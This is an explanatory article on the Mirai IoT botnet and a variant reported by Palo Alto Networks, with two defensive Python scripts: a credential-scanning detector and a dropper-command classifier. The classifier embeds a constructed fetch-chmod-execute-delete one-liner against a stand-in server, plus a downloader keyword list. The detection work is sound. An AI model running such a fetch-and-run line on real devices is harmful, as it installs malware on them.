One of the pieces of malware that over the years has caused the most problems, including and especially on corporate devices, is Mirai. It is a harmful component that has repeatedly "shed its skin" over time, updating its attack methods to become more and more effective. We speak of a Mirai botnet because, in order to spread, the malware exploits vulnerabilities in individual hardware devices that have been left unresolved (security patches not applied). Mirai also exploits insecure configurations and makes its way into devices protected only by default passwords or easy-to-guess credentials.
What is the Mirai botnet and how it works
Once successfully compromised, devices attacked by Mirai are added to a botnet, that is, a virtual network of devices under the direct control of the attackers. The Mirai botnet can then be used to launch large-scale DDoS (Distributed Denial of Service) attacks and take websites and services of all kinds offline. The infected devices, such as security cameras, routers, network equipment and other IoT devices, are "recruited" online and added to the botnet.
The creators of Mirai have developed a large list of common or default username and password combinations used on many devices. Furthermore, they continuously update the list of devices that can be attacked.
The botnet then runs large-scale IP address scanning to identify vulnerable devices and automatically attempts both a credential-based attack (walking the username/password list against the device's login interface) and an attack that tries to exploit known vulnerabilities.
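From the defender's side, the credential-list stage described above leaves a recognisable trace: a burst of failed logins from one source address that rotates through several usernames in seconds, sometimes followed by a successful login from the same address. The following Python script is an added example written for this article, not code from Palo Alto Networks or from Mirai itself; the log format and the log lines are constructed for the demonstration (the source address 203.0.113.10 plays the scanning bot, 198.51.100.7 an administrator who mistyped a password once), and the thresholds are assumptions to be tuned per device.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log: a simplified syslog-style record as an embedded device might
# emit for login attempts on its telnet/SSH/web interface. These lines are made up for
# the example; 203.0.113.10 plays the scanning bot, 198.51.100.7 an admin who mistyped
# a password once.
SAMPLE_LOG = """\
2024-01-10T12:00:01 router login: FAILED LOGIN from 203.0.113.10 user=admin
2024-01-10T12:00:02 router login: FAILED LOGIN from 203.0.113.10 user=root
2024-01-10T12:00:03 router login: FAILED LOGIN from 203.0.113.10 user=root
2024-01-10T12:00:04 router login: FAILED LOGIN from 203.0.113.10 user=admin
2024-01-10T12:00:05 router login: FAILED LOGIN from 203.0.113.10 user=support
2024-01-10T12:00:06 router login: FAILED LOGIN from 203.0.113.10 user=user
2024-01-10T12:00:07 router login: LOGIN OK from 203.0.113.10 user=admin
2024-01-10T12:05:00 router login: FAILED LOGIN from 198.51.100.7 user=admin
2024-01-10T12:05:30 router login: LOGIN OK from 198.51.100.7 user=admin
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ login: (?P<result>FAILED LOGIN|LOGIN OK) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) user=(?P<user>\S+)$"
)


def parse_events(log_text):
    """Turn log lines into dicts; lines that do not match the assumed format are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "ok": m["result"] == "LOGIN OK",
            "ip": m["ip"],
            "user": m["user"],
        })
    return events


def find_credential_scanners(log_text, window_seconds=60, min_failures=5, min_users=3):
    """Flag sources whose failure pattern looks like a credential list being walked.

    A source is flagged when, inside any window of `window_seconds`, it produced at
    least `min_failures` failed logins spread over at least `min_users` distinct
    usernames. An admin mistyping a password hits one username a few times; a bot
    walking a default-credential list rotates through accounts quickly. If a successful
    login from the same source follows the burst, treat the device as compromised.
    """
    by_ip = defaultdict(list)
    for ev in parse_events(log_text):
        by_ip[ev["ip"]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if not e["ok"]]
        for i in range(len(fails)):
            # grow the window from failure i as far as window_seconds allows
            j = i
            while (j + 1 < len(fails)
                   and (fails[j + 1]["ts"] - fails[i]["ts"]).total_seconds() <= window_seconds):
                j += 1
            burst = fails[i:j + 1]
            users = {e["user"] for e in burst}
            if len(burst) >= min_failures and len(users) >= min_users:
                last_fail = burst[-1]["ts"]
                success_after = any(e["ok"] and e["ts"] >= last_fail for e in evs)
                findings[ip] = {
                    "failures": len(burst),
                    "users": sorted(users),
                    "success_after_burst": success_after,
                }
                break
    return findings


if __name__ == "__main__":
    for ip, f in find_credential_scanners(SAMPLE_LOG).items():
        status = "COMPROMISED" if f["success_after_burst"] else "scan only"
        print(f"{ip}: {f['failures']} failures over users {f['users']} -> {status}")
```

On the sample log the bot address is flagged with six failures across four usernames and a success right after the burst; the administrator's single mistake is not flagged. Most consumer routers do not keep such logs locally, so in practice this logic is run on a syslog collector or a honeypot that receives them.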
Mirai variant attacks many router models from various manufacturers
Researchers at Palo Alto Networks have detected a variant of Mirai capable of targeting devices from many manufacturers. Among the brands mentioned are D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear and MediaTek.
The attackers targeted at least 22 different vulnerabilities, documented by Palo Alto, affecting routers and other hardware devices, in order to maximize the spread of Mirai on a global scale. The products affected by the security issues exploited by the Mirai botnet include routers, DVRs, NVRs, WiFi dongles, thermal monitoring systems, access control systems and photovoltaic panel monitoring equipment.
The attack begins by exploiting one of the vulnerabilities mentioned. In this way Mirai lays the groundwork for running a script at the shell level. The malicious script, fetched from a remote server, downloads the Mirai binary built for the compromised device's architecture. Currently, the cybercriminals have built versions of Mirai for the armv4l, arm5l, arm6l, arm7l, mips, mipsel, sh4, x86_64, i686, i586, arc, m68k and sparc platforms.
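The shell-script stage is the point at which an IDS, a web-application firewall in front of the management interface, or a honeypot sees the attack most clearly: an injected command that changes into a writable directory, pulls a file, makes it executable, runs it and often deletes it afterwards, with the filename carrying one of the architecture names listed above. The script below is an added example written for this article, not code from Palo Alto Networks or from the variant; the sample commands are constructed for the demonstration (198.51.100.23 is a documentation address standing in for the attacker's server, and the file names are made up), and the set of writable directories is an assumption drawn from common embedded-Linux layouts.

```python
import re
import shlex

# Architectures the report lists for the variant's binaries.
ARCHS = ["armv4l", "arm5l", "arm6l", "arm7l", "mips", "mipsel", "sh4",
         "x86_64", "i686", "i586", "arc", "m68k", "sparc"]

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
# Assumed: directories that are usually writable on embedded Linux targets.
WRITABLE_DIRS = ("/tmp", "/var/run", "/var/tmp", "/dev/shm", "/mnt")

# Constructed samples (not taken from the report or from any real campaign).
SAMPLE_DROPPER = (
    "cd /tmp || cd /var/run; busybox wget http://198.51.100.23/bins/bot.arm7l; "
    "chmod 777 bot.arm7l; ./bot.arm7l; rm -rf bot.arm7l"
)
SAMPLE_BENIGN = "cd /tmp; wget http://198.51.100.23/firmware-notes.txt"


def split_commands(cmd):
    """Split a shell one-liner on ; && || | and newlines (sufficient for droppers)."""
    return [c.strip() for c in re.split(r"\s*(?:;|&&|\|\||\||\n)\s*", cmd) if c.strip()]


def arch_tokens(word):
    """Return the architecture names that appear as a delimited suffix/infix of `word`.

    The delimiters stop 'arc' from matching inside 'arch' and 'mips' inside 'mipsel'.
    """
    found = set()
    for a in ARCHS:
        if re.search(rf"(?:^|[._/-]){re.escape(a)}(?:$|[._-])", word):
            found.add(a)
    return found


def analyze_command(cmd):
    """Classify a shell command string as dropper / download-only / benign."""
    info = {"downloads": [], "chmod": False, "executes": [], "cleanup": False,
            "archs": set()}
    for part in split_commands(cmd):
        try:
            argv = shlex.split(part)
        except ValueError:          # unbalanced quotes: fall back to whitespace split
            argv = part.split()
        if not argv:
            continue
        # "busybox wget ..." is the same as "wget ..." on embedded targets
        if argv[0] == "busybox" and len(argv) > 1:
            argv = argv[1:]
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in DOWNLOADERS:
            info["downloads"].append(part)
        elif prog == "chmod":
            info["chmod"] = True
        elif prog == "rm":
            info["cleanup"] = True
        elif argv[0].startswith("./") or argv[0].startswith(WRITABLE_DIRS):
            info["executes"].append(argv[0])   # running a freshly written file
        for word in argv:
            info["archs"] |= arch_tokens(word)
    info["archs"] = sorted(info["archs"])
    if info["downloads"] and (info["executes"] or info["chmod"]):
        info["verdict"] = "dropper"
    elif info["downloads"]:
        info["verdict"] = "download-only"
    else:
        info["verdict"] = "benign"
    return info


if __name__ == "__main__":
    for sample in (SAMPLE_DROPPER, SAMPLE_BENIGN):
        r = analyze_command(sample)
        print(f"{r['verdict']:14} archs={r['archs']} executes={r['executes']} "
              f"cleanup={r['cleanup']}")
```

The verdict deliberately requires download plus either chmod or execution: a plain download is what a firmware-update check looks like too, and flagging it alone would drown the alert in false positives. The architecture field is useful for triage, since the same dropper host usually serves one binary per architecture in the list above.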
To reduce the chance of detection, Mirai encrypts its strings (so that command-and-control addresses and similar indicators do not show up in a plain dump of the binary) and uses a number of technical tricks to act quickly and stealthily.
How to reduce the risk of infection
It is possible to reduce the risk of infection by applying the latest firmware update released by the manufacturer of your devices, replacing the default login credentials with a sufficiently strong username and password pair, and disabling remote access (management interfaces such as telnet, SSH or the web console reachable from the Internet side). In another article we have looked at how to improve the security of the router and WiFi, and which measures, on the other hand, are useless.
Among the signs of a possible Mirai infection are, for example, excessive overheating, unexplained changes to settings and configuration, frequent disconnections, and a general drop in device performance. None of these is conclusive on its own; a device that starts generating outbound connection attempts toward many addresses it never contacted before is a much stronger indicator, because that is the scanning activity an infected device performs on behalf of the botnet.
The top image is from Palo Alto Networks, Unit 42.